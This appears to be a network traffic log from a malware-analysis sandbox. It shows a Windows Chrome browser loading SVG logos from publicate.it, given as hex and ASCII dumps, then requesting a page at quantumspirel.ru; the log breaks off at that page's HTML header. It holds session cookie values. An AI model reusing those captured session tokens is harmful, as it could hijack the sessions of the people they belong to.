                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 4218
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "107a-620aa1d10297b"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IDNfcxGytRzM8VU6oZMKUVl7KKlHAFixaajOfpmZrAVmOATlvP1bNNuQFkwWQHE0dXJlIWHGm2hGbByP98%2BkgSrZwpfN9GKijneNIC7gantWGL8mWgY4SzSGQsg%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615adacee0cb4-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC621INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 31 34 2e 30 2e 30 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 34 33 33 36 33 29 20 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0d 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 14.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 43363) --><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 2c 34 2e 32 34 6c 31 36 2e 38 34 36 2c 34 30 2e 33 33 31 56 34 2e 32 34 48 33 32 2e 34 32 38 7a 20 4d 33 2e 37 30 31 2c 34 2e 32 34 76 34 30 2e 33 33 31 4c 32 30 2e 35 36 2c 34 2e 32 34 48 33 2e 37 30 31 7a 20 4d 31 39 2e 31 32 38 2c 33 36 2e 34 35 39 68 37 2e 38 35 35 0d 0a 09 6c 33 2e 32 31 2c 38 2e 31 31 32 68 37 2e 30 33 34 4c 32 36 2e 34 39 35 2c 31 39 2e 31 30 33 4c 31 39 2e 31 32 38 2c 33 36 2e 34 35 39 7a 22 2f 3e 0d 0a 3c 70 61 74 68 20 64 3d 22 4d 37 33 2e 33 33 32 2c 34 2e 31 33 34 6c 2d 39 2e 31 32 2c 34 30 2e 34 33 38 68 35 2e 35 32 6c 32 2e 34 2d 31 31 2e 31 35 39 68 38 2e 34 6c 32 2e 33 34 2c 31 31 2e 31 35 39 68 35 2e 35 38 6c 2d 38 2e 35 38 2d 34 30 2e 34 33 38 48 37 33 2e 33 33 32 7a 20 4d 37 32 2e 37 39 32 2c 32 38 2e 39 31 32 6c 31 2e
                                                                                                                                                                                                        Data Ascii: ,4.24l16.846,40.331V4.24H32.428z M3.701,4.24v40.331L20.56,4.24H3.701z M19.128,36.459h7.855l3.21,8.112h7.034L26.495,19.103L19.128,36.459z"/><path d="M73.332,4.134l-9.12,40.438h5.52l2.4-11.159h8.4l2.34,11.159h5.58l-8.58-40.438H73.332z M72.792,28.912l1.
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 20 4d 31 34 36 2e 32 31 32 2c 34 30 2e 33 31 32 63 2d 31 2e 31 34 31 2c 30 2d 32 2e 38 38 2d 30 2e 37 32 31 2d 33 2e 37 38 2d 34 2e 32 36 0d 0a 09 63 2d 30 2e 31 38 2d 30 2e 34 37 39 2d 30 2e 32 33 39 2d 31 2e 31 34 31 2d 30 2e 32 33 39 2d 31 2e 38 30 31 76 2d 38 2e 31 35 38 63 30 2d 30 2e 36 30 32 2c 30 2e 30 36 31 2d 31 2e 33 38 31 2c 30 2e 31 38 31 2d 31 2e 39 38 63 30 2e 34 32 2d 32 2e 31 2c 31 2e 39 32 2d 34 2e 33 32 2c 33 2e 37 37 38 2d 34 2e 33 32 0d 0a 09 63 33 2e 33 36 2c 30 2c 34 2e 36 38 32 2c 34 2e 35 2c 34 2e 36 38 32 2c 31 30 2e 30 38 43 31 35 30 2e 38 33 32 2c 33 35 2e 38 37 32 2c 31 34 39 2e 35 37 31 2c 34 30 2e 33 31 32 2c 31 34 36 2e 32 31 32 2c 34 30 2e 33 31 32 7a 20 4d 31 36 39 2e 37 37 33 2c 31 34 2e 39 33 33 63 2d 36 2e 30 36 31 2c
                                                                                                                                                                                                        Data Ascii: M146.212,40.312c-1.141,0-2.88-0.721-3.78-4.26c-0.18-0.479-0.239-1.141-0.239-1.801v-8.158c0-0.602,0.061-1.381,0.181-1.98c0.42-2.1,1.92-4.32,3.778-4.32c3.36,0,4.682,4.5,4.682,10.08C150.832,35.872,149.571,40.312,146.212,40.312z M169.773,14.933c-6.061,
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC859INData Raw: 2e 30 33 37 2c 31 2e 31 30 32 43 31 37 39 2e 32 31 32 2c 31 36 2e 37 37 31 2c 31 37 38 2e 37 35 31 2c 31 37 2e 32 36 32 2c 31 37 38 2e 31 37 35 2c 31 37 2e 32 35 36 7a 20 4d 35 31 2e 34 39 36 2c 34 2e 32 34 48 35 31 2e 34 39 0d 0a 09 63 2d 30 2e 37 31 2c 30 2d 31 2e 32 38 36 2c 30 2e 35 37 37 2d 31 2e 32 38 36 2c 31 2e 32 39 37 63 30 2c 30 2e 37 33 32 2c 30 2e 35 37 36 2c 31 2e 33 30 33 2c 31 2e 32 38 36 2c 31 2e 33 30 33 63 30 2e 37 31 35 2c 30 2c 31 2e 32 37 39 2d 30 2e 35 37 2c 31 2e 32 37 39 2d 31 2e 33 30 33 0d 0a 09 43 35 32 2e 37 37 2c 34 2e 38 31 37 2c 35 32 2e 32 30 35 2c 34 2e 32 34 2c 35 31 2e 34 39 36 2c 34 2e 32 34 7a 20 4d 35 31 2e 34 39 36 2c 36 2e 36 33 39 63 2d 30 2e 35 37 37 2c 30 2d 31 2e 30 34 33 2d 30 2e 34 38 34 2d 31 2e 30 34 33 2d
                                                                                                                                                                                                        Data Ascii: .037,1.102C179.212,16.771,178.751,17.262,178.175,17.256z M51.496,4.24H51.49c-0.71,0-1.286,0.577-1.286,1.297c0,0.732,0.576,1.303,1.286,1.303c0.715,0,1.279-0.57,1.279-1.303C52.77,4.817,52.205,4.24,51.496,4.24z M51.496,6.639c-0.577,0-1.043-0.484-1.043-


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        54192.168.2.549809104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC451OUTGET /images/trustpilot-1.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 4963
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "1363-620aa1d1c5e87"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqKIBmAdmX4K1e4h%2B7nhzrfRkpWG5nNmSet14dIZyyRoIwwPPY5Uj03UZB81BSTR7vbdRRFhvC%2BqeYYFCFfI0QfA4f0UG1JpYz7K0t47gEL%2F1HFRsry3s9CbhCMweg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615ada8e0420b-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC619INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 33 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 33 20 33 30 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 67 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 33 32 2e 31 31 38 20 31 30 2e 36 33 31 68 31 32 2e 33 36 33 76 32 2e 33 30 32 68 2d 34 2e 38 36 38 76 31 32 2e 39 37 33 68 2d 32 2e 36 36 38 56 31 32 2e 39 33 33 68 2d 34 2e 38 34 37 6c 2e 30 32 2d 32 2e 33 30 32 7a 6d 31 31 2e 38 33 33 20 34 2e 32 31 36 68 32 2e 32 38 31 76 32 2e 31 33 39 68 2e 30 34 63 2e 30 38 32 2d 2e 33 30 36
                                                                                                                                                                                                        Data Ascii: <svg width="123" height="30" viewBox="0 0 123 30" xmlns="http://www.w3.org/2000/svg"> <g fill-rule="nonzero" fill="none"> <path d="M32.118 10.631h12.363v2.302h-4.868v12.973h-2.668V12.933h-4.847l.02-2.302zm11.833 4.216h2.281v2.139h.04c.082-.306
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 34 39 68 2d 2e 30 34 63 2d 2e 33 30 36 2e 35 37 2d 2e 37 35 34 2e 39 39 38 2d 31 2e 33 34 35 20 31 2e 33 34 35 2d 2e 35 39 2e 33 34 36 2d 31 2e 32 30 31 2e 35 30 39 2d 31 2e 38 31 32 2e 35 30 39 2d 31 2e 34 34 37 20 30 2d 32 2e 35 30 36 2d 2e 33 34 36 2d 33 2e 31 35 37 2d 31 2e 30 38 2d 2e 36 35 32 2d 2e 37 31 32 2d 2e 39 37 38 2d 31 2e 38 31 32 2d 2e 39 37 38 2d 33 2e 32 35 38 76 2d 37 2e 30 32 37 68 32 2e 34 34 34 76 36 2e 37 38 32 63 30 20 2e 39 37 38 2e 31 38 33 20 31 2e 36 37 2e 35 37 20 32 2e 30 35 37 2e 33 36 37 2e 34 30 38 2e 38 39 36 2e 36 31 31 20 31 2e 35 36 39 2e 36 31 31 2e 35 30 39 20 30 20 2e 39 33 36 2d 2e 30 38 31 20 31 2e 32 38 33 2d 2e 32 34 34 2e 33 34 36 2d 2e 31 36 33 2e 36 33 31 2d 2e 33 36 37 2e 38 33 35 2d 2e 36 33 31 2e 32 32 34
                                                                                                                                                                                                        Data Ascii: 49h-.04c-.306.57-.754.998-1.345 1.345-.59.346-1.201.509-1.812.509-1.447 0-2.506-.346-3.157-1.08-.652-.712-.978-1.812-.978-3.258v-7.027h2.444v6.782c0 .978.183 1.67.57 2.057.367.408.896.611 1.569.611.509 0 .936-.081 1.283-.244.346-.163.631-.367.835-.631.224
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 2d 31 2e 30 31 39 2e 34 38 39 2d 31 2e 35 39 2e 36 33 31 2d 2e 35 39 2e 31 32 32 2d 31 2e 31 36 2e 32 30 34 2d 31 2e 37 33 2e 32 30 34 61 37 2e 32 39 35 20 37 2e 32 39 35 20 30 20 30 20 31 2d 31 2e 39 33 35 2d 2e 32 34 35 20 34 2e 39 32 37 20 34 2e 39 32 37 20 30 20 30 20 31 2d 31 2e 35 34 38 2d 2e 37 31 32 20 33 2e 34 31 39 20 33 2e 34 31 39 20 30 20 30 20 31 2d 31 2e 30 31 38 2d 31 2e 32 30 32 63 2d 2e 32 34 35 2d 2e 34 36 38 2d 2e 33 38 37 2d 31 2e 30 33 39 2d 2e 34 30 38 2d 31 2e 37 31 68 32 2e 34 36 35 76 2e 30 32 68 2e 30 32 7a 6d 38 2e 30 34 35 2d 37 2e 35 31 36 68 31 2e 38 35 33 76 2d 33 2e 33 34 68 32 2e 34 34 34 76 33 2e 33 32 68 32 2e 32 76 31 2e 38 31 33 68 2d 32 2e 32 76 35 2e 39 30 36 63 30 20 2e 32 36 35 2e 30 32 2e 34 36 38 2e 30 34 31 2e
                                                                                                                                                                                                        Data Ascii: -1.019.489-1.59.631-.59.122-1.16.204-1.73.204a7.295 7.295 0 0 1-1.935-.245 4.927 4.927 0 0 1-1.548-.712 3.419 3.419 0 0 1-1.018-1.202c-.245-.468-.387-1.039-.408-1.71h2.465v.02h.02zm8.045-7.516h1.853v-3.34h2.444v3.32h2.2v1.813h-2.2v5.906c0 .265.02.468.041.
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 31 2e 32 34 32 2e 31 30 31 2d 2e 34 38 39 2e 31 36 32 2d 2e 39 35 37 2e 31 36 32 2d 31 2e 34 34 36 7a 6d 34 2e 32 39 38 2d 39 2e 37 35 36 68 32 2e 34 34 34 76 32 2e 33 30 32 68 2d 32 2e 34 34 34 56 31 30 2e 36 33 7a 6d 30 20 34 2e 32 31 36 68 32 2e 34 34 34 76 31 31 2e 30 36 68 2d 32 2e 34 34 34 76 2d 31 31 2e 30 36 7a 6d 34 2e 36 32 33 2d 34 2e 32 31 36 68 32 2e 34 34 34 76 31 35 2e 32 37 35 48 39 39 2e 34 39 56 31 30 2e 36 33 31 7a 6d 39 2e 38 39 38 20 31 35 2e 35 38 63 2d 2e 38 37 36 20 30 2d 31 2e 36 37 2d 2e 31 34 32 2d 32 2e 33 36 33 2d 2e 34 34 37 61 35 2e 33 36 32 20 35 2e 33 36 32 20 30 20 30 20 31 2d 31 2e 37 35 31 2d 31 2e 32 30 32 20 35 2e 32 33 32 20 35 2e 32 33 32 20 30 20 30 20 31 2d 31 2e 30 38 2d 31 2e 38 35 33 20 37 2e 32 34 20 37 2e 32
                                                                                                                                                                                                        Data Ascii: 1.242.101-.489.162-.957.162-1.446zm4.298-9.756h2.444v2.302h-2.444V10.63zm0 4.216h2.444v11.06h-2.444v-11.06zm4.623-4.216h2.444v15.275H99.49V10.631zm9.898 15.58c-.876 0-1.67-.142-2.363-.447a5.362 5.362 0 0 1-1.751-1.202 5.232 5.232 0 0 1-1.08-1.853 7.24 7.2
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC237INData Raw: 68 2d 31 2e 38 35 33 76 2d 31 2e 38 35 33 2e 30 34 7a 4d 32 39 2e 32 36 37 20 31 30 2e 36 33 31 48 31 38 2e 30 38 36 4c 31 34 2e 36 34 34 20 30 20 31 31 2e 31 38 20 31 30 2e 36 33 31 20 30 20 31 30 2e 36 31 31 6c 39 2e 30 34 33 20 36 2e 35 37 38 4c 35 2e 35 38 20 32 37 2e 38 32 31 6c 39 2e 30 34 33 2d 36 2e 35 37 39 20 39 2e 30 34 33 20 36 2e 35 37 39 2d 33 2e 34 34 32 2d 31 30 2e 36 33 32 7a 22 20 66 69 6c 6c 3d 22 23 46 46 46 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 36 42 42 34 45 34 22 20 64 3d 22 6d 32 30 2e 39 39 38 20 31 39 2e 35 39 33 2d 2e 37 37 34 2d 32 2e 34 30 34 2d 35 2e 35 38 20 34 2e 30 35 33 7a 22 2f 3e 0a 20 20 20 20 3c 2f 67 3e 0a 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                        Data Ascii: h-1.853v-1.853.04zM29.267 10.631H18.086L14.644 0 11.18 10.631 0 10.611l9.043 6.578L5.58 27.821l9.043-6.579 9.043 6.579-3.442-10.632z" fill="#FFF"/> <path fill="#6BB4E4" d="m20.998 19.593-.774-2.404-5.58 4.053z"/> </g></svg>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        55192.168.2.549810104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC446OUTGET /images/group-2.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 1796
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "704-620aa1d197084"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOI08Kz7gAslEmkZ3d27aKBzM5FaU8fsmx2TCmrfIPdRsSHUPUSbsYhM2743pNivaQ4aN7LXI8k14aHoh250KxZcoZdsULz3PbIxM5lXRr7583HxbzIDm%2F16wpkDdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615ada9cc72b3-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC624INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 34 33 22 20 68 65 69 67 68 74 3d 22 32 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 34 33 20 32 38 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 67 20 66 69 6c 6c 3d 22 23 46 46 42 39 33 31 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 6d 31 33 2e 35 33 35 20 32 31 2e 32 34 35 2d 35 2e 39 37 20 33 2e 31 33 38 61 31 20 31 20 30 20 30 20 31 2d 31 2e 34 35 31 2d 31 2e 30 35 34 6c 31 2e 31 34 2d 36 2e 36 34 38 61 31 20 31 20 30 20 30 20 30 2d 2e 32 38 38 2d 2e 38 38 35 6c 2d 34 2e 38 33 2d 34 2e 37 30 38 61 31 20 31 20 30 20 30 20 31 20 2e 35 35 34 2d 31 2e 37
                                                                                                                                                                                                        Data Ascii: <svg width="143" height="28" viewBox="0 0 143 28" xmlns="http://www.w3.org/2000/svg"> <g fill="#FFB931" fill-rule="evenodd"> <path d="m13.535 21.245-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.7
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1172INData Raw: 38 61 31 20 31 20 30 20 30 20 31 20 31 2e 37 39 34 20 30 6c 32 2e 39 38 35 20 36 2e 30 34 38 61 31 20 31 20 30 20 30 20 30 20 2e 37 35 33 2e 35 34 37 6c 36 2e 36 37 35 2e 39 37 61 31 20 31 20 30 20 30 20 31 20 2e 35 35 34 20 31 2e 37 30 36 6c 2d 34 2e 38 33 20 34 2e 37 30 38 61 31 20 31 20 30 20 30 20 30 2d 2e 32 38 38 2e 38 38 35 6c 31 2e 31 34 20 36 2e 36 34 38 61 31 20 31 20 30 20 30 20 31 2d 31 2e 34 35 20 31 2e 30 35 34 6c 2d 35 2e 39 37 2d 33 2e 31 33 38 61 31 20 31 20 30 20 30 20 30 2d 2e 39 33 31 20 30 7a 4d 37 30 2e 39 33 35 20 32 31 2e 32 34 35 6c 2d 35 2e 39 37 20 33 2e 31 33 38 61 31 20 31 20 30 20 30 20 31 2d 31 2e 34 35 31 2d 31 2e 30 35 34 6c 31 2e 31 34 2d 36 2e 36 34 38 61 31 20 31 20 30 20 30 20 30 2d 2e 32 38 38 2d 2e 38 38 35 6c 2d 34
                                                                                                                                                                                                        Data Ascii: 8a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547l6.675.97a1 1 0 0 1 .554 1.706l-4.83 4.708a1 1 0 0 0-.288.885l1.14 6.648a1 1 0 0 1-1.45 1.054l-5.97-3.138a1 1 0 0 0-.931 0zM70.935 21.245l-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        56192.168.2.549811172.67.187.134436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC341OUTGET // HTTP/1.1
                                                                                                                                                                                                        Host: quantumspirel.ru
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        x-powered-by: PHP/7.3.33
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3yn%2BE3n3w0y8p5xC1oISwTaKx9jXcHY9cD52z54tbenWvM6QGXfYrSitegtMxlL%2B1UAEcxLfDwkNglu7dQU5ermEpaD7prjrSY7oSwA8UdPc34nNqTNlyvTSFScTRnd0e7kd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615adabed4366-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC718INData Raw: 31 61 65 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 75 70 65 72 63 61 72 20 53 6f 63 69 65 74 79 20 2d 20 71 75 61 6e 74 75 6d 73 70 69 72 65 6c 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62
                                                                                                                                                                                                        Data Ascii: 1ae8<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Supercar Society - quantumspirel.ru</title> <link href="https://cdn.jsdelivr.net/npm/b
